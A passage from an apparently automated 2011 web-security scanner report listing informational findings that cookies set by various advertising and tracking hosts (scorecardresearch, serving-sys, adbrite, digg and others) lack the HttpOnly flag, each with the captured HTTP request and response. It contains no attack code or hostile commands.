xVGfJBTFJujfwmoI+hRnc0LKORZAW1k5UeRkcRWCxLU52Me6ffBrSbQX2gnquKfS/b2VxpsWIm9rqf9zggWUDUrLtjKHHb1VVj+DgCD8+I6KxeXWrM0HOR10VA4/0vBbIbNfATwNEy72w8TZPWEb3p6LuFVvkrmJba841Ct2n2oS5ZeOq92UJQC6zjcYBLSxhF/t0AXtP7snMG+fZJDQwTvYGIQxtQZHil+3kXGDsffUdM3gb5syA9TCD/GpqE7Q3zYla7eCr5CWRdyEo3aZArBm7SqICFsHGhZSy//kxyHIB1otYfec3oESL3KgwPx4NyC/mDgzZQ1wt8ul6U9FCachkJ20hyVwespxYmr1+C05loldoIpguKfJkypsL+OS6RJU5FePTqpTUUoONn9nUKTy2Lsf5oc+Ek523257M/WcT6RgFIYhPu9y3Yr0rRdU0ulvPgycSTBrckLVb+D20GBuAyvfHoRoF62HV3ayGi/zh8siNJrhagSxaDEwXFucKUtavUMYEKTuRC8j2Ms7UyozH2JneopaDxgNJk+MKoVo2q5POAaOWl4Qa+4MMIBI5QEx757bfG9N5l7UiP4bmcg7jXVgOBlxvHVpqzaHZqbeE+hJAaYTgNJzGErBSf/JcZb+Bq1cxASNCLskHhpluAui7Mx3UfrKvZg1TBQAUT8tUmtBQVGG2rNrP8rUiTrIqJusRRAFGN4Z3Q4huvP+/6v0ly/Ajia3r0+PTunlBnF8m6hgek8/eD/1KZcpcezRJIH+FJffqEgwDG4XaW9PDSOnZVfZ97kzQFJ1DsgF7eT6O/leYLQbV7H1yx7g68Z9yK9XBfVT3Gp8e2mhq9IibPvafvXO9k9+fkyyzaLP+99jIeYOAGU/SjLsIF0PeYW9M3EVanQgdnNYYMm5zSlzveLFp1n6uSQCAGzn5SFQqGhfFuWQmTiQt2RxusqhOc/01vsL/Xim8k33jwRkhzBq27oQ
DyOwKJknkzJXI+dt6w/jVSbNHb/KGbMBj+GrY7ubtdTvUsuH"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:39 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

10.22. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=6635176&rn=1308436746&c7=http%3A%2F%2Fbcp.crwdcntrl.net%2F4%2Fc%3D34%257Crand%3D395066690%257Cpv%3Dy%257Crt%3Difr&c9=http%3A%2F%2Fwww.bebo.com%2F&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=34%7Crand=395066690%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 06 Jul 2011 11:22:09 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Fri, 05-Jul-2013 11:22:09 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.23. http://b.scorecardresearch.com/p

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: UID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p HTTP/1.1
Host: b.scorecardresearch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Length: 0
Location: http://b.scorecardresearch.com/p2?
Date: Wed, 06 Jul 2011 11:21:27 GMT
Connection: close
Set-Cookie: UID=845ba2-96.6.41.192-1309951287; expires=Fri, 05-Jul-2013 11:21:27 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: u2, eyeblaster. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=5650363~~0~~~^ebAdDuration~899~0~01020&OptOut=0&ebRandom=0.8620431364979595&flv=10.3181&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
Origin: http://pubads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=6d1502f0-782c-4c66-9617-aa4652ec4df13IV010; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=10.3181&RES=128&WMPV=0; expires=Tue, 04-Oct-2011 07:36:40 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:36:39 GMT
Connection: close
Content-Length: 0


10.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: A3, B3. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2800593&PluID=0&w=300&h=250&ncu=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB3tv7QUUUTsa3EM_ylAekkezuAa3mhMIBo5ejqBCFk__xOwAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi0xNzY3NDYzNTAzNTIwODY3oAGrl7rtA7IBDHd3dy5iZWJvLmNvbboBCjMwMHgyNTBfYXPIAQnaARRodHRwOi8vd3d3LmJlYm8uY29tL5gCxBPAAgXIApWysAvgAgDqAhlCZWJvX0hvbWVfMzAweDI1MF9BVEZMZWZ0qAMB6APCBOgD0wHoA_gD9QMAAIDB4AQBgAbPpJns29D66cwB%26num%3D1%26sig%3DAGiWqtwsO8bMZJ6jQcjqukrS_j5W81cmAg%26client%3Dca-pub-1767463503520867%26adurl%3Dhttp%253A%252F%252Fva.px.invitemedia.com%252Fpixel%253FreturnType%253Dredirect%2526key%253DClick%2526message%253DeJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1d0i0ts0JCfAI6XYs8DR1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgC0CRj.%2526redirectURL%253D&ord=ThRFQQAEG8YK5TlPHdsIpA==&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://pubads.g.doubleclick.net/gampad/ads?correlator=1309951294291&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_Home_300x250_ATFLeft&page_slots=Bebo_Home_300x250_ATFLeft&cust_params=Age%3D&cookie=ID%3D5d1731d2d654c623%3AT%3D1309951294%3AS%3DALNI_MYs8-PBIDTpzhXnmr-Aos6FdpkB-w&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2F&lmt=1309969296&dt=1309951296825&cc=65&biw=1057&bih=822&ifi=1&adk=491404383&u_tz=-300&u_his=2&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&flash=10.3.181&gads=v2&ga_vid=570193707.1309951297&ga_sid=1309951297&ga_hid=2099858697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; ActivityInfo=000dg4csN%5f000db5csN%5f000tbQcu6%5f000rFIcsM%5f000tbRcu6%5f; A3=gs35b0E.0ca7000009bExaZS0084o00002h8evaYRd0bI400000kYwuaZXq09MY00001kSEGaZWa03sY00001lp66b0xe0dMv00002lGhvb0Ah0cEt00003kPIlaZWa03sY00000kFaLa.2L09EZ00001jem9a.2L0c7wa.2L1kHgIb0v.02WG00001kLQDb0xt0cbO00001lEOyaYx40cie00001h51Tb0yn0ca700002eBxyaZST03iw00001h4.ob0xr0ca700002hePeb0wK0cbO00001l7XCa+WC08Y500001lzuRa+WF0ckj00001h4.pb0vz0ca700001h51Sb0Ah0ca700001lFP5aZRG0dSu00001lkqFa.2B06hH00001leMha.2F06hH00001jmcDa.2B0c7w00001jDBSaZUd0cbS00001kovFb0xt0cjc00002l.wtb0wj07Nz00001kSCsaZWb03sY00001le66b1nb02WG00001lGkWb0vy0cEt00001jmdZa.2F0c7w00001jDDva+WC0cbS00001jDCqa+WC0cbS00001hePyb0xq0cbO00001lu2rb0yg04m400001gs36b0xr0ca700000iyQIaYRd0bnA00001lu0naYvn0czN00002iz3QaZRG0bnA00001; B3=78ox0000000001vc835N0000000001vjanad0000000001vc990p0000000001v5atH70000000001vfawTK0000000002vjaFbT0000000001vmaKr10000000001vjaJmE0000000001vcajpm0000000001vcajpn0000000000vc9l7u0000000001vf8SCH0000000001vcamoJ0000000001v59xv30000000001vf9xvo0000000001vc82MD0000000003vjaF580000000001vk82MC0000000003vkaAsi0000000001vf9xv40000000001vf8n.z0000000000v9afgy0000000001vf838g0000000001vj9yJj0000000001vj8SC30000000001v982ME0000000000vjaHLh0000000001vfaF7y0000000002v89u4N0000000002vj838c0000000001vjawPH0000000001vf9.360000000001v89i8L0000000001vf82MA0000000000vkajpj0000000001vc90mq0000000001v54ZUH0000000002vc7dNF0000000001vjaKr20000000003vk

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:21:39 GMT
Connection: close
Content-Length: 2366

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.26. http://bstats.adbrite.com/adserver/behavioral-data/0

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bstats.adbrite.com
Path:   /adserver/behavioral-data/0

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ut, vsd. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.27. http://cang.baidu.com/do/add

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cang.baidu.com
Path:   /do/add

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: BAIDUID. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /do/add?it=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&iu=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&fr=ien&dc= HTTP/1.1
Host: cang.baidu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: apache 1.0.9.0
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com
Content-Type: text/html
Cache-Control: no-cache
Connection: close
Content-Length: 7393

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

10.28. http://clk.atdmt.com/MRT/go/285207471/direct/01/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /MRT/go/285207471/direct/01/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: ach00, ach01. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/285207471/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://view.atdmt.com/action/atlasdmt_home
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Wed, 06 Jul 2011 11:40:44 GMT
Connection: close


10.29. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: uid. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8496530639253255806

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8496530639253255806; Domain=.p-td.com; Expires=Mon, 02-Jan-2012 11:21:57 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 11:21:56 GMT

GIF89a.............!.......,...........D..;

10.30. http://delicious.com/save

Summary

Severity:   Information
Confidence:   Certain
Host:   http://delicious.com
Path:   /save

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /save HTTP/1.1
Host: delicious.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 06 Jul 2011 11:41:13 GMT
Set-Cookie: BX=83u2utp718iep&b=3&s=du; expires=Tue, 06-Jul-2013 20:00:00 GMT; path=/; domain=.delicious.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.delicious.com/save
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: private
Age: 0
Connection: close
Server: YTS/1.19.5

The document has moved <A HREF="http://www.delicious.com/save">here</A>.<P>
<!-- fe02.web.del.ac4.yahoo.net uncompressed/chunked Wed Jul 6 11:41:13 UTC 2011 -->

10.31. http://digg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=be4697b47d58b1200ef3f6956c8cc49e2813419339d6fd7bb526092b66b1dc13; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=237528 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 101255

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- The Latest News Headlines, Videos and Images
</title>

<met
...[SNIP]...

10.32. http://digg.com/upcoming

Summary

Severity:   Information
Confidence:   Certain
Host:   http://digg.com
Path:   /upcoming

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /upcoming HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: imp_id=d49aeb50a0490b4b7e1f800682c23d942b50abde233eda6a7b26c684f1cf95d6; expires=Thu, 07-Jul-2011 11:37:07 GMT; path=/; domain=digg.com
X-Digg-Time: D=300792 10.2.129.80
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98962

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- All Topics
- Upcoming News Headlines, Videos and Images
</title>

<meta
...[SNIP]...

10.33. http://friendfeed.com/share

Summary

Severity:   Information
Confidence:   Certain
Host:   http://friendfeed.com
Path:   /share

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /share HTTP/1.1
Host: friendfeed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 06 Jul 2011 11:21:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 0
Vary: Cookie
Server: FriendFeedServer/0.1
Location: https://friendfeed.com/account/login?next=%2Fshare
Cache-Control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: AT=2925609834650468622_1309951295; Domain=.friendfeed.com; Path=/


10.34. http://idcs.interclick.com/Segment.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /Segment.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9787d0d4-9d7b-4605-985d-7786f61ba68e HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
